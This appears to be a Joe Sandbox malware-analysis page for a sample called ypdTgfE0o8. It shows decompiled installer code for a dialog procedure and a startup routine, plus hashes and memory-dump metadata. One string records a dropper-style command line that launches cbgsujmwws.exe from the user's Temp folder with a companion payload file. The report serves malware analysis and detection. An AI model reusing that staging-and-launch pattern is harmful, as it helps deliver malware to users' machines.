0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426758;
			}

0x00406848
0x00406851
0x00000000
0x0040685e
0x00406854
0x00000000

APIs

FindFirstFileW.KERNELBASE(76F1FAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNEL32(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8);
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "\"F@"), _t133);
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8);
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8); // executed
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						_t145 =  *0x425708 - _t136; // 0x0
						if(_t145 == 0 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f6f
0x00403f76
0x004040dd
0x004040e1
0x004040e5
0x004040e7
0x004040ec
0x004040f7
0x00404102
0x00404107
0x00404109
0x0040410b
0x0040410e
0x00404113
0x00404121
0x0040412e
0x00404135
0x00404135
0x00404136
0x00404136
0x0040413b
0x00404141
0x00404148
0x0040414e
0x00404150
0x00404190
0x00404195
0x0040419a
0x0040419a
0x0040419f
0x004041a8
0x004041aa
0x004041af
0x004041b5
0x004041b9
0x004041b9
0x004041be
0x004041c4
0x00000000
0x00000000
0x004041cf
0x004041d5
0x00000000
0x00000000
0x004041de
0x004041e6
0x004041eb
0x004041ee
0x004041f4
0x004041f9
0x004041fc
0x00404202
0x00404207
0x0040420a
0x00404210
0x00404218
0x0040421e
0x00404224
0x00404228
0x0040422f
0x0040422f
0x0040422f
0x00404239
0x0040424b
0x00404257
0x0040425c
0x00404266
0x0040426c
0x0040426e
0x00404273
0x00404270
0x00404270
0x00404270
0x00404283
0x0040429b
0x0040429d
0x004042a3
0x004042b8
0x004042a5
0x004042ae
0x004042b0
0x004042b0
0x004042be
0x004042cf
0x004042e5
0x004042ec
0x004042f2
0x004042f6
0x004042fb
0x004042fd
0x00000000
0x00404303
0x00404303
0x00404305
0x00000000
0x00000000
0x0040430b
0x0040430f
0x00404334
0x0040433a
0x00404340
0x00404342
0x00000000
0x00000000
0x00404368
0x0040436e
0x00404370
0x00404375
0x00000000
0x00000000
0x0040437b
0x0040437e
0x00404381
0x00404398
0x004043a4
0x004043bd
0x004043c3
0x004043c7
0x004043cc
0x004043d2
0x00000000
0x00000000
0x004043dc
0x004043e7
0x00000000
0x004043e7
0x00404311
0x00404317
0x00000000
0x00000000
0x0040431d
0x00404323
0x00000000
0x00000000
0x00000000
0x00404329
0x004042fd
0x004043f4
0x00404400
0x00404407
0x00000000
0x00404152
0x00404152
0x00404155
0x00404188
0x00404188
0x0040418a
0x00000000
0x00000000
0x00000000
0x0040418a
0x00404157
0x0040415b
0x00404160
0x00404162
0x00000000
0x00000000
0x00404172
0x0040417a
0x00000000
0x00404180
0x00403f88
0x00403f88
0x00403f8c
0x00403f91
0x00403fa0
0x00403fa0
0x00403fa6
0x00403fad
0x00403ff1
0x00403ff7
0x00404010
0x00404013
0x00404026
0x0040402c
0x00000000
0x00000000
0x00404032
0x0040403d
0x0040403f
0x00404041
0x00404060
0x00404060
0x00404063
0x00404068
0x0040406b
0x0040407b
0x0040407c
0x0040407e
0x004040b4
0x004040c4
0x00000000
0x004040c4
0x00404080
0x00404086
0x0040409f
0x004040a4
0x004040a6
0x00000000
0x00000000
0x004040a8
0x00404094
0x00404094
0x00404096
0x00404096
0x00000000
0x00404096
0x00404089
0x0040408e
0x00000000
0x0040408e
0x0040406d
0x00404073
0x00000000
0x00000000
0x00404075
0x00000000
0x00404075
0x00404065
0x00000000
0x00404065
0x0040404b
0x00404052
0x00404058
0x0040405a
0x00404430
0x00000000
0x00404430
0x00000000
0x0040405a
0x00404018
0x00000000
0x00404020
0x00403fff
0x00404005
0x0040440d
0x0040440d
0x00404413
0x00404420
0x00404426
0x00404426
0x00000000
0x00403faf
0x00403fb4
0x00403fc0
0x00403fc9
0x004040ca
0x00000000
0x00403fe8
0x00403feb
0x00000000
0x00403feb
0x00403fc9
0x00403fad

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32 ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32 ref: 004040FD
GetDlgItem.USER32 ref: 00404107
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32 ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
EnableWindow.USER32(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32 ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 2475350683-0
Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E0040644E(L"1033", _t73 & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405EDE(_t98, _t86) == 0) {
						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(_t86, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bbc
0x00403bc5
0x00403bcc
0x00403bce
0x00403be2
0x00403bf4
0x00403bfd
0x00403c06
0x00403c0d
0x00403c12
0x00403c19
0x00403c2c
0x00403c2c
0x00403c37
0x00403bd0
0x00403bd0
0x00403bdb
0x00403bdb
0x00403c3c
0x00403c46
0x00403c4f
0x00403c54
0x00403c65
0x00403cf7
0x00403cff
0x00403d08
0x00403d08
0x00403d1e
0x00403d24
0x00403d32
0x00403db3
0x00403dbb
0x00403dc5
0x00403dca
0x00403dd0
0x00403e5a
0x00403e5f
0x00403e61
0x00403e7d
0x00000000
0x00403e7d
0x00403e63
0x00403e69
0x00403e71
0x00403e71
0x00000000
0x00403e69
0x00403dde
0x00403de9
0x00403dee
0x00403df0
0x00403df7
0x00403df7
0x00403e02
0x00403e0a
0x00403e0c
0x00403e0e
0x00403e17
0x00403e1a
0x00403e20
0x00403e20
0x00403e3f
0x00403e50
0x00000000
0x00403e55
0x00403dbd
0x00403dbf
0x00000000
0x00403d34
0x00403d34
0x00403d40
0x00403d4a
0x00403d50
0x00403d55
0x00403d64
0x00403e82
0x00403e82
0x00000000
0x00403e82
0x00403d73
0x00403dae
0x00000000
0x00403dae
0x00403c6b
0x00403c6b
0x00403c6e
0x00403c70
0x00000000
0x00000000
0x00403c7e
0x00403c90
0x00403c95
0x00403c9e
0x00000000
0x00000000
0x00403ca4
0x00403ca6
0x00403cb3
0x00403cb3
0x00403cbc
0x00403cc2
0x00403cea
0x00403cf2
0x00000000
0x00403cd4
0x00403cd5
0x00403cde
0x00403ce4
0x00403ce5
0x00000000
0x00403ce5
0x00403ce0
0x00403ce2
0x00000000
0x00000000
0x00000000
0x00403ce2
0x00403cc2

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

GetUserDefaultUILanguage.KERNELBASE(00000002,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,?,?,?,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,76F1FAA0), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,?,?,?,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,?,00000000,?), ref: 00403CD5
LoadImageW.USER32 ref: 00403D1E
RegisterClassW.USER32 ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32 ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32 ref: 00403E0A
GetClassInfoW.USER32 ref: 00403E17
RegisterClassW.USER32 ref: 00403E20
DialogBoxParamW.USER32 ref: 00403E3F

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA
RichEdit20W, xrefs: 00403E02, 00403E08
.DEFAULT\Control Panel\International, xrefs: 00403C22
RichEdit, xrefs: 00403E11
RichEd20, xrefs: 00403DE4
RichEd32, xrefs: 00403DF2
